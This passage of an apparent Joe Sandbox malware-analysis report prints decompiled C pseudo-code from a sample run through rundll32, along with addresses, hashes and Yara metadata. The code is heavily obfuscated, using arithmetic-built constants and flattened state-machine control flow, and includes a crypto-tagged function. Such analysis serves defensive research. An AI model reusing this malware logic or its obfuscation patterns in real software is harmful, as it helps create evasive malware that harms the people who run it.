				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E0079AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E00797FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E0079ED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E007A8519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E00795E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E00798B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                          0x0079554f
                                                                                                                          0x00795558
                                                                                                                          0x00795560
                                                                                                                          0x00795561
                                                                                                                          0x00795568
                                                                                                                          0x0079556f
                                                                                                                          0x00795570
                                                                                                                          0x00795572
                                                                                                                          0x00795577
                                                                                                                          0x00795582
                                                                                                                          0x00795584
                                                                                                                          0x0079558f
                                                                                                                          0x00795592
                                                                                                                          0x00795598
                                                                                                                          0x0079559c
                                                                                                                          0x007955a1
                                                                                                                          0x007955b0
                                                                                                                          0x007955b1
                                                                                                                          0x007955b5
                                                                                                                          0x007955bd
                                                                                                                          0x007955c5
                                                                                                                          0x007955cd
                                                                                                                          0x007955d5
                                                                                                                          0x007955d9
                                                                                                                          0x007955e1
                                                                                                                          0x007955e9
                                                                                                                          0x007955f6
                                                                                                                          0x007955fa
                                                                                                                          0x00795602
                                                                                                                          0x0079560a
                                                                                                                          0x00795612
                                                                                                                          0x0079561a
                                                                                                                          0x00795627
                                                                                                                          0x0079562b
                                                                                                                          0x00795633
                                                                                                                          0x0079563b
                                                                                                                          0x00795640
                                                                                                                          0x00795648
                                                                                                                          0x00795650
                                                                                                                          0x00795658
                                                                                                                          0x00795660
                                                                                                                          0x00795665
                                                                                                                          0x0079566d
                                                                                                                          0x00795675
                                                                                                                          0x00795682
                                                                                                                          0x00795686
                                                                                                                          0x0079568e
                                                                                                                          0x00795696
                                                                                                                          0x0079569e
                                                                                                                          0x007956a3
                                                                                                                          0x007956ab
                                                                                                                          0x007956b3
                                                                                                                          0x007956bb
                                                                                                                          0x007956c3
                                                                                                                          0x007956cb
                                                                                                                          0x007956d3
                                                                                                                          0x007956db
                                                                                                                          0x007956e0
                                                                                                                          0x007956e8
                                                                                                                          0x007956f6
                                                                                                                          0x007956ff
                                                                                                                          0x00795703
                                                                                                                          0x0079570b
                                                                                                                          0x00795713
                                                                                                                          0x0079571b
                                                                                                                          0x00795720
                                                                                                                          0x00795728
                                                                                                                          0x00795730
                                                                                                                          0x0079573a
                                                                                                                          0x00795742
                                                                                                                          0x0079574a
                                                                                                                          0x0079574f
                                                                                                                          0x00795757
                                                                                                                          0x0079575f
                                                                                                                          0x00795767
                                                                                                                          0x00795775
                                                                                                                          0x0079577a
                                                                                                                          0x00795780
                                                                                                                          0x00795788
                                                                                                                          0x00795790
                                                                                                                          0x0079579c
                                                                                                                          0x007957a4
                                                                                                                          0x007957ad
                                                                                                                          0x007957b1
                                                                                                                          0x007957b6
                                                                                                                          0x007957be
                                                                                                                          0x007957c6
                                                                                                                          0x007957ce
                                                                                                                          0x007957d6
                                                                                                                          0x007957e3
                                                                                                                          0x007957e7
                                                                                                                          0x00000000
                                                                                                                          0x007957ef
                                                                                                                          0x00795801
                                                                                                                          0x0079591d
                                                                                                                          0x00000000
                                                                                                                          0x0079591d
                                                                                                                          0x0079580d
                                                                                                                          0x007958ac
                                                                                                                          0x007958bb
                                                                                                                          0x007958c0
                                                                                                                          0x007958c5
                                                                                                                          0x007958da
                                                                                                                          0x007958db
                                                                                                                          0x007958dc
                                                                                                                          0x007958e1
                                                                                                                          0x007958e7
                                                                                                                          0x00795901
                                                                                                                          0x0079590f
                                                                                                                          0x00795912
                                                                                                                          0x00795915
                                                                                                                          0x00795915
                                                                                                                          0x007958e7
                                                                                                                          0x00795916
                                                                                                                          0x00000000
                                                                                                                          0x00795916
                                                                                                                          0x00795819
                                                                                                                          0x00795856
                                                                                                                          0x00795859
                                                                                                                          0x0079585b
                                                                                                                          0x00795860
                                                                                                                          0x00795864
                                                                                                                          0x0079586e
                                                                                                                          0x0079586b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079586d
                                                                                                                          0x0079586d
                                                                                                                          0x00795872
                                                                                                                          0x00795874
                                                                                                                          0x00795878
                                                                                                                          0x00795892
                                                                                                                          0x00795892
                                                                                                                          0x00000000
                                                                                                                          0x00795892
                                                                                                                          0x0079587a
                                                                                                                          0x0079588c
                                                                                                                          0x0079588c
                                                                                                                          0x00795890
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00795890
                                                                                                                          0x00000000
                                                                                                                          0x0079587a
                                                                                                                          0x0079581d
                                                                                                                          0x00795975
                                                                                                                          0x0079597b
                                                                                                                          0x00795987
                                                                                                                          0x00795987
                                                                                                                          0x00795829
                                                                                                                          0x0079595b
                                                                                                                          0x00795961
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00795967
                                                                                                                          0x00795849
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079584f
                                                                                                                          0x0079584f
                                                                                                                          0x00795943
                                                                                                                          0x00795948
                                                                                                                          0x0079594d
                                                                                                                          0x00795959
                                                                                                                          0x00000000
                                                                                                                          0x00795959
                                                                                                                          0x0079594f
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1t{$9Q$;<$e}n
                                                                                                                          • API String ID: 0-2095593254
                                                                                                                          • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                          • Instruction ID: 155e7357fb066fc01c917a688597c0c139f0ccd93ad6d44d9f1f6354519eb740
                                                                                                                          • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                          • Instruction Fuzzy Hash: 87B151B1108341CFCB28CF25E58591BBBE1FBC4748F10891DF69686220D7B59A4ACF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A7DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007A7DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E007A6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E007B13AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E007ADCF7(_v1084, 0x791000, __eflags);
						_t256 =  *0x7b3e10; // 0x0
						_t272 =  *0x7b3e10; // 0x0
						E007947CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E0079A8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E0079B6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E0079B1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E007A473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E00793E3F();
					goto L8;
				}
				_t236 =  *0x7b3e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                          0x007a7dd5
                                                                                                                          0x007a7ddb
                                                                                                                          0x007a7de2
                                                                                                                          0x007a7de7
                                                                                                                          0x007a7dec
                                                                                                                          0x007a7df4
                                                                                                                          0x007a7dfc
                                                                                                                          0x007a7e0d
                                                                                                                          0x007a7e11
                                                                                                                          0x007a7e1f
                                                                                                                          0x007a7e24
                                                                                                                          0x007a7e2a
                                                                                                                          0x007a7e32
                                                                                                                          0x007a7e3a
                                                                                                                          0x007a7e3f
                                                                                                                          0x007a7e47
                                                                                                                          0x007a7e4f
                                                                                                                          0x007a7e54
                                                                                                                          0x007a7e5c
                                                                                                                          0x007a7e64
                                                                                                                          0x007a7e6c
                                                                                                                          0x007a7e74
                                                                                                                          0x007a7e7c
                                                                                                                          0x007a7e88
                                                                                                                          0x007a7e8d
                                                                                                                          0x007a7e93
                                                                                                                          0x007a7e9b
                                                                                                                          0x007a7ea3
                                                                                                                          0x007a7eab
                                                                                                                          0x007a7eb3
                                                                                                                          0x007a7ebb
                                                                                                                          0x007a7ec3
                                                                                                                          0x007a7ecf
                                                                                                                          0x007a7ed2
                                                                                                                          0x007a7ed6
                                                                                                                          0x007a7ede
                                                                                                                          0x007a7ee6
                                                                                                                          0x007a7eeb
                                                                                                                          0x007a7ef3
                                                                                                                          0x007a7efb
                                                                                                                          0x007a7f03
                                                                                                                          0x007a7f0b
                                                                                                                          0x007a7f18
                                                                                                                          0x007a7f1c
                                                                                                                          0x007a7f24
                                                                                                                          0x007a7f2c
                                                                                                                          0x007a7f34
                                                                                                                          0x007a7f39
                                                                                                                          0x007a7f3d
                                                                                                                          0x007a7f45
                                                                                                                          0x007a7f4d
                                                                                                                          0x007a7f55
                                                                                                                          0x007a7f5a
                                                                                                                          0x007a7f62
                                                                                                                          0x007a7f6a
                                                                                                                          0x007a7f72
                                                                                                                          0x007a7f7a
                                                                                                                          0x007a7f87
                                                                                                                          0x007a7f8b
                                                                                                                          0x007a7f90
                                                                                                                          0x007a7f98
                                                                                                                          0x007a7fa0
                                                                                                                          0x007a7fa8
                                                                                                                          0x007a7fb0
                                                                                                                          0x007a7fbd
                                                                                                                          0x007a7fca
                                                                                                                          0x007a7fd7
                                                                                                                          0x007a7fdf
                                                                                                                          0x007a7fe4
                                                                                                                          0x007a7fec
                                                                                                                          0x007a7ff4
                                                                                                                          0x007a7ffc
                                                                                                                          0x007a8001
                                                                                                                          0x007a8009
                                                                                                                          0x007a8011
                                                                                                                          0x007a8019
                                                                                                                          0x007a801e
                                                                                                                          0x007a8026
                                                                                                                          0x007a802e
                                                                                                                          0x007a8036
                                                                                                                          0x007a803b
                                                                                                                          0x007a8043
                                                                                                                          0x007a804b
                                                                                                                          0x007a8058
                                                                                                                          0x007a805c
                                                                                                                          0x007a8064
                                                                                                                          0x007a806c
                                                                                                                          0x007a8074
                                                                                                                          0x007a807c
                                                                                                                          0x007a8084
                                                                                                                          0x007a808c
                                                                                                                          0x007a8094
                                                                                                                          0x007a809c
                                                                                                                          0x007a80a4
                                                                                                                          0x007a80ac
                                                                                                                          0x007a80b9
                                                                                                                          0x007a80bd
                                                                                                                          0x007a80c5
                                                                                                                          0x007a80cd
                                                                                                                          0x007a80d2
                                                                                                                          0x007a80da
                                                                                                                          0x007a80e2
                                                                                                                          0x007a80ea
                                                                                                                          0x007a80f2
                                                                                                                          0x007a80fa
                                                                                                                          0x007a8102
                                                                                                                          0x007a810c
                                                                                                                          0x007a8110
                                                                                                                          0x00000000
                                                                                                                          0x007a8118
                                                                                                                          0x007a812a
                                                                                                                          0x007a81f0
                                                                                                                          0x007a81f5
                                                                                                                          0x007a8200
                                                                                                                          0x007a8201
                                                                                                                          0x007a8210
                                                                                                                          0x007a8215
                                                                                                                          0x007a8218
                                                                                                                          0x00000000
                                                                                                                          0x007a8218
                                                                                                                          0x007a8132
                                                                                                                          0x007a8164
                                                                                                                          0x007a816d
                                                                                                                          0x007a8175
                                                                                                                          0x007a8186
                                                                                                                          0x007a819e
                                                                                                                          0x007a81b1
                                                                                                                          0x007a81c6
                                                                                                                          0x007a81cb
                                                                                                                          0x007a81ce
                                                                                                                          0x00000000
                                                                                                                          0x007a81ce
                                                                                                                          0x007a813a
                                                                                                                          0x007a825a
                                                                                                                          0x007a8263
                                                                                                                          0x007a826d
                                                                                                                          0x00000000
                                                                                                                          0x007a827c
                                                                                                                          0x007a8142
                                                                                                                          0x007a815d
                                                                                                                          0x007a8155
                                                                                                                          0x007a8155
                                                                                                                          0x00000000
                                                                                                                          0x007a8155
                                                                                                                          0x007a8146
                                                                                                                          0x007a8239
                                                                                                                          0x007a8239
                                                                                                                          0x007a823f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a823f
                                                                                                                          0x007a8150
                                                                                                                          0x00000000
                                                                                                                          0x007a8150
                                                                                                                          0x007a8222
                                                                                                                          0x007a8227
                                                                                                                          0x007a822e
                                                                                                                          0x007a8237
                                                                                                                          0x00000000
                                                                                                                          0x007a8237
                                                                                                                          0x007a8230
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: MC=$g^/h$|[a$/
                                                                                                                          • API String ID: 0-1545830693
                                                                                                                          • Opcode ID: 85de990929a238b3706081e4f55c347ef85626abd4bc4f1896f6fe7ec276e281
                                                                                                                          • Instruction ID: e2907652253dd5889d84399fe71cc534cfe84086222c1113fa4ac5e476c46678
                                                                                                                          • Opcode Fuzzy Hash: 85de990929a238b3706081e4f55c347ef85626abd4bc4f1896f6fe7ec276e281
                                                                                                                          • Instruction Fuzzy Hash: 34C110B11083858FC7A8CF25D58A91BFBE1FBC1758F508A1DF19256260D7B98A4ACF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AA2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007AA2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E007AC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E007A8519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E00797FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E0079ED7E(_v88, _t193, _v56, _t197, _t226);
												E007A8519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E00797FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
